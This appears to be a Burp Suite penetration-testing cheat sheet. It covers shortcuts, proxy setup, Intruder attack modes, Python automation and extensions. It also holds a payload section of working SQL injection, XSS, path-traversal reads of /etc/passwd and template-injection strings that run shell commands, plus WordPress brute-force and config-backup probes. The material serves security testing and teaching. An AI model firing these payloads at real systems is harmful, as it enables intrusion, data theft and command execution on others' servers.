1. Keyboard Shortcuts
Global Shortcuts
Shortcut Action Ctrl+Shift+D Switch to Dashboard Ctrl+Shift+T Switch to Target Ctrl+Shift+P Switch to Proxy Ctrl+Shift+I Switch to Intruder Ctrl+Shift+R Switch to Repeater Ctrl+Shift+O Switch to Organizer Ctrl+Shift+E Switch to Extender Ctrl+, Open Burp Suite preferences
Proxy Shortcuts
Shortcut Action Ctrl+I Toggle interception on/off Ctrl+F Forward intercepted request Ctrl+D Drop intercepted request Ctrl+A Select all Ctrl+L Go to URL in browser Ctrl+R Send to Repeater Ctrl+T Send to Intruder Ctrl+S Send to Scanner (Professional)
Repeater Shortcuts
Shortcut Action Ctrl+Space Send request Ctrl+Enter Send request Ctrl+/ Go to previous request Ctrl+. Go to next request Ctrl+U URL encode selection
2. Proxy Usage
Basic Configuration
Configure proxy listener:
Proxy > Proxy Settings > Add
Binding: 127.0.0.1:8080 (default)
Enable “Running” checkbox
Configure browser proxy settings:
HTTP proxy: 127.0.0.1
Port: 8080
Or install “FoxyProxy” extension
Install Burp CA certificate in browser:
Navigate to http://burp
Download CA certificate
Import into browser’s trusted certificates
Intercepting Requests
Enable interception: Proxy > Intercept > “Intercept is on”
Actions with intercepted requests:
Modify headers, parameters, or body content
Forward: Send request to server
Drop: Discard request
Action > Send to other Burp tools
Request History
View all requests in Proxy > HTTP History
Filter requests by domain, file type, status code, etc.
Right-click to send to other Burp tools
Match and Replace
Proxy > Options > Match and Replace
Automatically modify requests/responses based on regex patterns
3. Intruder Attack Types
Sniper
Tests each position individually with payloads
Positions: 3, Payloads: 10 = 30 requests
Best for: Testing single vulnerabilities across multiple positions
POST /login HTTP/1.1
Host: example.com
username=§admin§&password=§password§
Battering Ram
Uses same payload in all defined positions simultaneously
Positions: 3, Payloads: 10 = 10 requests
Best for: Testing when same input is needed in multiple fields
POST /login HTTP/1.1
Host: example.com
username=§admin§&password=§admin§
Pitchfork
Uses different payload sets for different positions
Each position gets its corresponding payload
Positions: 3, Payloads per set: 10 = 10 requests
Best for: Testing with related data (username+password pairs)
POST /login HTTP/1.1
Host: example.com
username=§username§&password=§password§
Cluster Bomb
Tests all combinations of payloads
Positions: 3, Payloads per set: 10 = 1,000 requests
Best for: Brute force attacks (username + password combinations)
POST /login HTTP/1.1
Host: example.com
username=§username§&password=§password§
4. Common Payloads for Attacks
SQL Injection Payloads
' OR 1=1 --
' OR '1'='1
' UNION SELECT 1,2,3 --
' UNION SELECT table_name,2,3 FROM information_schema.tables --
' UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users' --
' AND (SELECT 5151 FROM (SELECT(SLEEP(5)))tImc) --
' AND extractvalue(rand(),concat(0x7e,(SELECT version()),0x7e)) --
XSS Payloads
<script>alert('XSS')</script>
<img src="x" onerror="alert('XSS')">
<svg onload="alert('XSS')">
<body onload="alert('XSS')">
javascript:alert('XSS')
';alert('XSS');//
"><script>alert('XSS')</script>
LFI Payloads
../../../etc/passwd
....//....//....//etc/passwd
..%2F..%2F..%2Fetc%2Fpasswd
/proc/self/environ
/var/log/apache2/access.log
php://filter/convert.base64-encode/resource=/etc/passwd
SSTI (Server-Side Template Injection) Payloads
${7*7}
{{7*7}}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}
${T(java.lang.Runtime).getRuntime().exec('whoami')}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
WordPress-Specific Payloads
/wp-login.php
/wp-admin
/wp-content/uploads/
/wp-content/plugins/
/wp-config.php.bak
/wp-config.php~
/?author=1
Fuzzing Payloads
# Path discovery
/admin
/backup
/config
/dev
/.git/HEAD
# File extensions
.bak
.old
.swp
.txt
.zip
.tar.gz
# WordPress files
wp-config.php
wp-content/debug.log
wp-content/uploads/
5. Repeater & Decoder Usage
Repeater
Send intercepted requests to Repeater: Right-click > Send to Repeater
Modify request and click “Send” to resend
View side-by-side request and response
Use multiple tabs for comparing responses
Right-click > Change request method (GET/POST)
Decoder
Select text and right-click > Send to Decoder (or Ctrl+Shift+D)
Encoding options:
URL: Convert special characters to %XX format
HTML: Convert characters to HTML entities
Base64: Encode/decode as Base64
ASCII Hex: Convert to/from hexadecimal
Hex: Raw binary data as hexadecimal
Gzip: Compress/decompress using gzip
Deflate: Compress/decompress using deflate
Chained encoding/decoding:
“Encode as…” applies the encoding
“Decode as…” attempts to decode
Multiple encodings can be applied sequentially
6. Automating with Burp Suite API
Python Script for Sending Requests Through Burp Proxy
import requests
# Burp Proxy settings
proxies = {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080'
}
# Custom headers
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
# Disable SSL verification (often needed with Burp)
requests.packages.urllib3.disable_warnings()
# GET request through Burp
def send_get(url):
response = requests.get(
url,
proxies=proxies,
headers=headers,
verify=False # Disable SSL verification
)
return response
# POST request through Burp
def send_post(url, data):
response = requests.post(
url,
data=data,
proxies=proxies,
headers=headers,
verify=False # Disable SSL verification
)
return response
# Example usage
target = "https://example.com/login"
login_data = {
"username": "admin",
"password": "password123"
}
response = send_post(target, login_data)
print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")
Using Burp REST API (Professional)
import requests
import json
# Burp Enterprise API settings
api_url = "http://localhost:1337/api/scan"
api_key = "your_api_key_here"
headers = {
"Content-Type": "application/json",
"Authorization": f"Bearer {api_key}"
}
# Create a new scan
def create_scan(target_url):
payload = {
"scan_configurations": [
{"type": "NamedConfiguration", "name": "Default"}
],
"urls": [target_url]
}
response = requests.post(
api_url,
headers=headers,
data=json.dumps(payload)
)
return response.json()
# Get scan status
def get_scan_status(scan_id):
response = requests.get(
f"{api_url}/{scan_id}",
headers=headers
)
return response.json()
# Example usage
new_scan = create_scan("https://example.com")
scan_id = new_scan["id"]
print(f"Created scan with ID: {scan_id}")
status = get_scan_status(scan_id)
print(f"Scan status: {status['scan_status']}")
7. Popular Burp Extensions
Essential Extensions
Extension Name Description Logger++ Advanced logging of requests and responses Autorize Authorization enforcement testing Turbo Intruder Fast intruder with custom attack scripting Active Scan++ Extends active scanning capabilities CSRF Scanner Detects Cross-Site Request Forgery vulnerabilities JWT Editor Testing and manipulating JSON Web Tokens JSON Beautifier Pretty-prints and validates JSON content Retire.js Identifies vulnerable JavaScript libraries Autorize Authorization enforcement checking Paraminer Parameter mining for hidden attack surfaces WordPress Scanner Specific scanner for WordPress vulnerabilities
Installing Extensions
Extender > BApp Store
Browse or search for extensions
Click “Install” button
View loaded extensions under Extender > Extensions
WordPress-Specific Extensions
WP Plugin Scanner: Enumerates and tests WordPress plugins
WP Scanner Integration: Integrates WPScan results
CMS Scanner: Detects WordPress and plugin versions
8. Tips for Optimizing Burp Suite Performance
Memory Management
Increase Java heap size:
Burp > Project options > Misc > Java Environment
Maximum memory allocation: 2048 MB (adjust based on RAM)
Speed Optimization
Use target scope to limit requests:
Target > Scope > Include in scope
Project options > Scope > URL Scope
Enable “Use smart scan settings” in Scanner
Disable logging for file types:
Proxy > Options > Intercept Client Requests
Disable for: .jpg$|.gif$|.png$|.css$|.js$
Efficient Workflows
Use Burp project files to save/restore state
Create and use saved scan configurations
Use match/replace rules for repetitive changes
Create macros for multi-step authentication
Resource Saving
Disable passive scanning if not needed
Configure response interception strategically
Set up strict scoping for large applications
Use Intruder’s “Number of threads” wisely (20-50 is often optimal)
WordPress-Specific Optimizations
Add WordPress admin paths to scope
Create scan profiles specific to WordPress vulnerabilities
Use match/replace rules to add WordPress authentication cookies automatically
